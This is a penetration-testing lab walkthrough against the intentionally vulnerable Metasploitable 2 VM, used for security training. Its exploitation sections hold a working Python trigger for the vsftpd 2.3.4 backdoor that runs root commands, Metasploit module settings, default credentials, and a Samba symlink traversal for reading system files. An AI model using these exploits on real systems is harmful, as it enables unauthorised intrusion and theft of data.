# EXPLOITING METASPLOITABLE 2
Metasploitable 2 is an intentionally vulnerable Ubuntu Linux virtual machine built for security training and penetration-testing practice. In this walkthrough I exploit its weaknesses methodically, following a common penetration-testing lifecycle: reconnaissance, enumeration and exploitation. The attacking platform is Kali Linux. By the end of this guide you will have a clear picture of how several independent weaknesses on one host each lead to control of the system, and why a single unpatched service or one default password is enough.
## Lab Environment Setup
Before we begin, make sure the lab is set up correctly. The Metasploitable 2 VM (192.168.40.135 in my lab) and the Kali Linux VM sit on the same network segment (a NAT network in VMware). Keep that network isolated from anything you do not own: the target exposes an unauthenticated root shell, so a host-only network, or a NAT network with no port forwarding and no other machines on it, is the safe choice for ethical testing.
After booting Metasploitable 2 in VMware and logging in with the supplied credentials, I checked its IP address, as shown below:

## Reconnaissance
My first step is to discover the target and map its attack surface. I began with a simple ping sweep to confirm connectivity.

To build a complete profile of the target, I ran a service and script scan with nmap using the -sC -sV -Pn arguments (this is not nmap's "aggressive" -A profile, which would additionally run OS detection and a traceroute).
-sV: service version detection, the step that fingerprints the software behind each port so that known vulnerabilities can be matched to it.
-sC: runs the default set of NSE (Nmap Scripting Engine) scripts, which automate common checks such as anonymous FTP login, SMB share and user enumeration, and banner collection.
-Pn: skips host discovery and treats every listed host as online. This is useful when a firewall blocks nmap's discovery probes (ICMP echo and timestamp plus TCP probes to ports 80 and 443, not only ping). On the same LAN nmap would discover the host by ARP anyway, so here the flag is mostly insurance; against a large address range it also makes nmap port-scan addresses with nothing behind them, which is slow.
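Screenshots of raw nmap output are hard to work with, so it is worth saving the scan (`-oX`) and pulling the findings out of it programmatically. The following is an added example, not code from the original walkthrough or from nmap: it parses an nmap XML report, lists the open ports with product and version, and flags the versions and protocols that the findings section below singles out. The embedded `SAMPLE_XML` is a constructed, trimmed report in nmap's `-oX` format whose version strings mirror the ones reported for Metasploitable 2; the `KNOWN_ISSUES` table is my own.

```python
"""Parse an nmap XML report and flag services the walkthrough singles out.

Added example, not code from the original walkthrough or from nmap. Produce
the input with:  nmap -sC -sV -Pn -oX msf2.xml 192.168.40.135
SAMPLE_XML below is a constructed, trimmed report in that format.
"""
import sys
import xml.etree.ElementTree as ET

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
<host><address addr="192.168.40.135" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd" version="2.3.4"/></port>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH"/></port>
<port protocol="tcp" portid="23"><state state="open"/><service name="telnet" product="Linux telnetd"/></port>
<port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn" product="Samba smbd" version="3.0.20-Debian"/></port>
<port protocol="tcp" portid="1524"><state state="open"/><service name="bindshell" product="Metasploitable root shell"/></port>
<port protocol="tcp" portid="6667"><state state="open"/><service name="irc" product="UnrealIRCd" version="3.2.8.1"/></port>
<port protocol="tcp" portid="8009"><state state="closed"/><service name="ajp13"/></port>
<port protocol="tcp" portid="8180"><state state="open"/><service name="http" product="Apache Tomcat/Coyote JSP engine" version="1.1"/></port>
</ports></host></nmaprun>
"""

# (product substring, version prefix) -> why the walkthrough treats it as a priority target.
KNOWN_ISSUES = {
    ("vsftpd", "2.3.4"): "planted backdoor: root shell on TCP/6200 after a ':)' in USER",
    ("UnrealIRCd", "3.2.8.1"): "planted backdoor: remote command execution",
    ("Samba", "3.0.20"): "symlink directory traversal through any writable share",
}
# Protocols that carry credentials unencrypted (telnet, ftp and the r-services on 512-514).
CLEARTEXT = {"ftp", "telnet", "exec", "login", "shell"}


def parse_nmap_xml(text):
    """Return one dict per open port: host, port, proto, name, product, version."""
    root = ET.fromstring(text)
    services = []
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            attr = svc.attrib if svc is not None else {}
            services.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "name": attr.get("name", ""),
                "product": attr.get("product", ""),
                "version": attr.get("version", ""),
            })
    return sorted(services, key=lambda s: (s["host"], s["port"]))


def flag_findings(services):
    """Match each open service against KNOWN_ISSUES plus the cleartext and bind-shell checks."""
    findings = []
    for s in services:
        for (product, version), note in KNOWN_ISSUES.items():
            if product.lower() in s["product"].lower() and s["version"].startswith(version):
                findings.append((s["port"], note))
        if s["name"] in CLEARTEXT:
            findings.append((s["port"], f"{s['name']} sends credentials in cleartext"))
        if s["name"] == "bindshell" or "root shell" in s["product"].lower():
            findings.append((s["port"], "unauthenticated bind shell"))
    return findings


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    svcs = parse_nmap_xml(text)
    for s in svcs:
        print(f"{s['port']}/{s['proto']:<4} {s['name']:<12} {s['product']} {s['version']}".rstrip())
    print("--- findings ---")
    for port, note in flag_findings(svcs):
        print(f"{port}: {note}")
```

Run it as `python3 triage.py msf2.xml` after the real scan; with no argument it runs over the constructed sample. Matching on a version prefix rather than equality is deliberate: Debian-style strings such as `3.0.20-Debian` would otherwise slip past an exact comparison.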



The scan shows a system with a large, badly maintained attack surface: a long list of outdated and insecure services, many of them carrying well-documented, high-severity vulnerabilities.
#### Key findings include:
**Multiple critical entry points**: the scan identified several high-priority targets, including:
- vsFTPd 2.3.4 on port 21, a release that circulated with a planted backdoor giving command execution.
- A root-level bind shell (the service nmap labels a root shell) listening directly on port 1524, with no authentication at all.
- UnrealIRCd 3.2.8.1 on port 6667, known for a planted remote code execution backdoor.
- Outdated versions of Samba (3.0.20) on ports 139/445, OpenSSH on port 22, and Apache Tomcat 5.5 on the non-standard port 8180.
**Poor security posture**: the host shows no hardening at all. Services such as telnet (port 23), the Berkeley r-services rexec, rlogin and rsh (ports 512, 513 and 514) and FTP carry credentials in cleartext, and anonymous logins are permitted on several services.
**Information leakage**: the system readily discloses excessive information, such as exact software versions, user accounts (via rusers and finger) and even internal hostnames (irc.Metasploitable.LAN), all of which help an attacker choose and tailor exploits.
## Exploitation
### FTP Backdoor
The number of vulnerabilities in the scan results offers many routes to initial access. For this demonstration I exploit one of the most critical and best known: the backdoor deliberately planted in a tampered vsFTPd 2.3.4 source archive. When a username containing the characters `:)` is sent, the daemon opens a shell on TCP port 6200. One caveat: only builds compiled from the tampered archive (which was served from the project's download site for a few days in mid-2011) contain it, so the 2.3.4 banner alone is not proof; the real test is whether port 6200 answers after the trigger. To do this efficiently I use the Metasploit Framework.

Metasploit's power lies in its modular database of exploits, payloads and auxiliary modules. I begin by searching that database for a module matching the target service (`search vsftpd`), as shown above.
The search returns the dedicated module, exploit/unix/ftp/vsftpd_234_backdoor. I load it with `use` and inspect its configuration with `show options`.

The only mandatory option is RHOSTS. No credentials are needed and the default payload (cmd/unix/interact) simply attaches to the shell the backdoor spawns, which underscores that this is a direct, unauthenticated path to command execution.
With the target set, I run the module to trigger the backdoor, as shown above.
The exploit triggers the hidden listener in the FTP service and hands me an interactive command shell on the target. Critically, the shell runs as root, because it is spawned by the privileged vsftpd process rather than by a logged-in session, so no privilege escalation is needed: absolute control of the system from the outset, from one unpatched service. Note that the session is a raw /bin/sh over a TCP socket rather than a Meterpreter session; it shows no prompt, so run `id` and `whoami` first to confirm who you are.
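To see what the Metasploit module actually does on the wire, the following added example reproduces its steps by hand. It is not the page's code and not Metasploit's module: it sends a `USER` command containing `:)` on the FTP control port, checks whether the listener on TCP/6200 appeared, and then runs a command through it. The host is a parameter (192.168.40.135 is the lab target from the text); `END_MARKER` is a sentinel of my own so the client knows when a command's output has ended, since the raw shell sends no prompt.

```python
"""Trigger the vsftpd 2.3.4 backdoor by hand and talk to the shell it opens.

Added example: not the page's code and not Metasploit's module, but the same
steps as exploit/unix/ftp/vsftpd_234_backdoor. Use only against systems you
are authorised to test.
"""
import socket
import sys
import time

FTP_PORT = 21
BACKDOOR_PORT = 6200
END_MARKER = b"__VSFTPD_DONE__"   # our own sentinel: marks the end of a command's output


def trigger_commands(user="x", password="y"):
    """The two FTP commands that activate the backdoor; the smiley in USER is the trigger."""
    return [f"USER {user}:)\r\n".encode(), f"PASS {password}\r\n".encode()]


def send_trigger(host, port=FTP_PORT, timeout=5.0):
    """Open the control connection, read the banner and send the trigger; returns the banner."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(1024)
        for cmd in trigger_commands():
            s.sendall(cmd)
        # A tampered daemon spawns the 6200 listener while handling USER; the
        # login itself need not succeed, so we do not wait for a reply to PASS.
    return banner.decode(errors="replace").strip()


def backdoor_open(host, port=BACKDOOR_PORT, timeout=3.0):
    """True if something accepts connections on the backdoor port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def run_command(host, command, port=BACKDOOR_PORT, timeout=5.0):
    """Run one shell command through the backdoor and return its output as text."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(f"{command}; echo {END_MARKER.decode()}\n".encode())
        buf = b""
        while END_MARKER not in buf:
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
    return buf.split(END_MARKER)[0].decode(errors="replace").strip()


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.40.135"
    print("banner:", send_trigger(target))
    time.sleep(1)   # give the daemon a moment to bind the listener
    if not backdoor_open(target):
        # A 2.3.4 banner alone is not proof: only builds from the tampered archive have the listener.
        sys.exit("port 6200 did not open: this build is not backdoored, or a firewall is in the way")
    print(run_command(target, "id; uname -a"))
```

The `backdoor_open` check is the part worth keeping even if you stay with Metasploit: it separates "banner says 2.3.4" from "this binary is actually backdoored", which is the difference between a finding and a false positive in a report.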
### Gaining Access via Default Telnet Credentials
This step shows a login to Metasploitable 2 over the insecure Telnet protocol using a default account. I authenticated with the easily guessed credentials msfadmin / msfadmin and got an unprivileged command-line session, then used basic commands (ls, pwd and the like) to explore the user's home directory. Because Telnet has no encryption, the same username and password could have been read off the wire by anyone on the network segment running a packet capture, which is why the service should not exist on a modern network at all.

### Gaining Graphical Access with a VNC Password Crack
First, I used Metasploit's VNC login scanner (auxiliary/scanner/vnc/vnc_login) to check whether the VNC service on port 5900 accepts a weak password. The scanner reported that the password was simply 'password'.

To connect to the target's graphical desktop I needed a VNC viewer, so I installed a common one, xtightvncviewer, on my Kali machine (`sudo apt install xtightvncviewer`).

Using the viewer and the recovered password (`xtightvncviewer 192.168.40.135:5900`), I connected to the target's VNC server. The session it exposes is a desktop already logged in as root, so one weak VNC password gives full graphical control of Metasploitable 2 with root rights and no further escalation.


### Exploiting PostgreSQL with a Default Password
I searched Metasploit for modules related to postgresql (`search postgresql`) to find a way to attack the database service.

From the results I chose exploit/linux/postgres/postgres_payload, a Linux-specific exploit that uses an authenticated PostgreSQL superuser session to write a shared library onto the server and load it with CREATE FUNCTION, which gives native code execution as the database's OS user.

I configured the exploit for the Metasploitable machine: the target's IP plus the default PostgreSQL username and password (postgres:postgres), which the server accepted. The whole attack rests on that one default password, because the postgres role is a superuser and the server is listening on the network rather than only on localhost.


### Exploiting Apache Tomcat Manager
I searched Metasploit for an exploit targeting the old Apache Tomcat release found in the scan (`search tomcat`).

I chose exploit/multi/http/tomcat_mgr_upload, which logs in to the Tomcat Manager application and deploys a WAR file containing the payload. I set the target's IP, the non-standard port (8180) and the default manager credentials (tomcat:tomcat). Running the exploit returned a remote session.

The attack worked: I obtained a Meterpreter session on the target and listed the top-level directory to confirm access to the file system. Note that this session runs under Tomcat's own service account rather than root, so unlike the FTP backdoor this route would still need privilege escalation for full control of the host.

### Stealing Password Files via Samba
First, I enumerated the target's SMB shares (`smbclient -L //192.168.40.135 -N`), connecting anonymously with no password, and found a share called tmp.

I then used Metasploit's auxiliary/admin/smb/samba_symlink_traversal module, the Samba Symlink Directory Traversal exploit. It abuses the way this Samba version follows symbolic links: given a share the client can write to, it creates a symlink inside the share that points outside it, and Samba then serves whatever the link targets, folders it was never meant to expose.

I pointed the module at the tmp share (the SMBSHARE option). It created a link named rootfs that points at the server's root directory (/).

Connecting to the tmp share again (`smbclient //192.168.40.135/tmp -N`), I could now see the rootfs directory. Entering it let me browse the target's entire file system, including the sensitive /etc directory.

Inside rootfs/etc I used smbclient's `more` command to view the server's passwd file (a `get passwd` downloads it), which lists every account on the system with its UID, home directory and login shell. It does not contain password hashes: those live in /etc/shadow, which is readable only by root, and because the share was opened anonymously the traversal runs with the rights of Samba's guest account, so it can read only what any unprivileged local user could.
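A downloaded passwd file is most useful once it is triaged: which accounts have a real login shell (the ones worth trying over Telnet or SSH), which are UID 0, and whether any entry has an empty password field. The following is an added example, not part of the original walkthrough. `SAMPLE_PASSWD` is constructed in /etc/passwd format: msfadmin and postgres are accounts the text names, while the other lines, including the suspicious `backup2` entry that demonstrates the UID 0 and empty-password checks, are illustrative only.

```python
"""Triage a passwd file pulled from a target.

Added example, not part of the original walkthrough. SAMPLE_PASSWD is a
constructed file; only msfadmin and postgres are accounts named in the text.
"""
import sys

SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
backup2::0:0::/root:/bin/sh
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false", ""}


def parse_passwd(text):
    """Parse passwd lines into dicts; malformed lines are skipped rather than guessed at."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def interactive_accounts(entries):
    """Accounts with a real login shell: candidates for password guessing over telnet/ssh."""
    return [e["name"] for e in entries if e["shell"] not in NOLOGIN_SHELLS]


def uid0_accounts(entries):
    """Every account that is effectively root; anything beyond 'root' is a red flag."""
    return [e["name"] for e in entries if e["uid"] == 0]


def empty_password_accounts(entries):
    """Entries whose password field is empty log in with no password at all.
    'x' means the hash lives in /etc/shadow, which the Samba traversal cannot read."""
    return [e["name"] for e in entries if e["pw"] == ""]


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    entries = parse_passwd(text)
    print("interactive:", interactive_accounts(entries))
    print("uid 0      :", uid0_accounts(entries))
    print("no password:", empty_password_accounts(entries))
```

Run it as `python3 passwd_triage.py passwd` on the file fetched with `get`. The interactive list feeds directly back into the Telnet step above: default-credential guessing is far more effective against a known list of real shell accounts than against a wordlist of usernames.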

## Conclusion
This walkthrough showed how quickly a poorly secured system falls. With freely available tools we found outdated software and weak or default passwords, and each of them on its own was enough for a shell, several of them as root. It shows that keeping software updated, removing unused services (an exposed root bind shell and cleartext Telnet have no place on any network), changing default passwords and keeping administrative interfaces such as the Tomcat Manager, VNC and the database off the network are basic, non-negotiable steps. Metasploitable is a powerful reminder of what happens when they are ignored.
Thank you for reading this.
Regards, dr3amy!